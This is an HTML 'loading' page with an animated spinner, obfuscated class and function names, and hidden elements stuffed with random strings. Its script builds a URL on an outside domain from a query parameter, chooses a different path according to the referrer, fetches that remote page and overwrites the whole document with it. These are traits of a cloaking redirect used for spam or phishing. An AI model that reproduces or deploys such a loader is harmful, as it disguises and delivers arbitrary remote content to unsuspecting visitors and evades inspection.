<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .rAD3MC {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .rAD3MC .YdEQWXXW305 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .rAD3MC .content {
            line-height: 50px;
            text-align: center
        }

        .rAD3MC .img {
            width: 100%
        }

        .rAD3MC .r8x5ahxiP {
            text-align: center
        }

        .rAD3MC .r8x5ahxiP span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .rAD3MC .r8x5ahxiP span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .rAD3MC .r8x5ahxiP span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .rAD3MC .r8x5ahxiP span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .rAD3MC .r8x5ahxiP span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .rAD3MC .r8x5ahxiP span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .rAD3MC .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function ujK77aTKWaf(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var ml1qg = ujK77aTKWaf('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ ml1qg +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ ml1qg +".html?a=share";
		}
		
        Pbgxl6ey=url+"#"+new Date().getTime();
        Pbgxl6ey && function() {
            $.get(Pbgxl6ey, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<li style='display:none' >YTXfxqqaXSXmAfIRuMQ5wil6vyOB9ZPpAceYHM</li>
<span style='display:none'>UOG2cQ4LaHEEqwdUSd8T0N7UG3G8Qr88sQCQONGnD1nFO0oshTe1m</span>
<b style='display:none' >WvS3p5nPKQ3mFWw7w</b>
<li style='display:none' >YTXfxqqaXSXmAfIRuMQ5wil6vyOB9ZPpAceYHM</li>
<ul style='display:none' >IiFqBC8LXMwrFrvXkyY5ZfuHmOsNeE8epWm5tlztGboVjUf3ivxU4ZAn20sj9pYPfvqdiMw93KAtIhEPZT4npqZqmgg</ul>
<div style='display:none'>FLnMb7SJUGUf55AZyXRvgoJLTZvIb</div><div class="rAD3MC">
    <div class="YdEQWXXW305">
        <div class="r8x5ahxiP">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>IltZl5JuRCqjlzm4ev9lgtaBQWiRmicmgIyGzNpa6ln8xVjg</span>
<p  style='display:none'>HPKI46UWQbSymNkIk3KrKZ4Gg0iZ6rqAedRSeVajSvs5D</p>
<b style='display:none' >fcyVcKblUphSFdwzUJnyeCeDkPH0u</b>
<img  src='' style='display:none'>
<li style='display:none' >jbLPXVwaj8s8qd58BwNu7f0wrquThYgXG5Fipx3YeD9BdauMkcxkPvtp6zfOGY0o7jZvtdU</li>
<b style='display:none' >fcyVcKblUphSFdwzUJnyeCeDkPH0u</b>
<h1 style='display:none' >dYLN5rVZY93H15Hc1ZKMiD8c5LE6KTkNINp6S7FYFqQKMTpghjLbWIvCia63yv6</h1></body>
</html>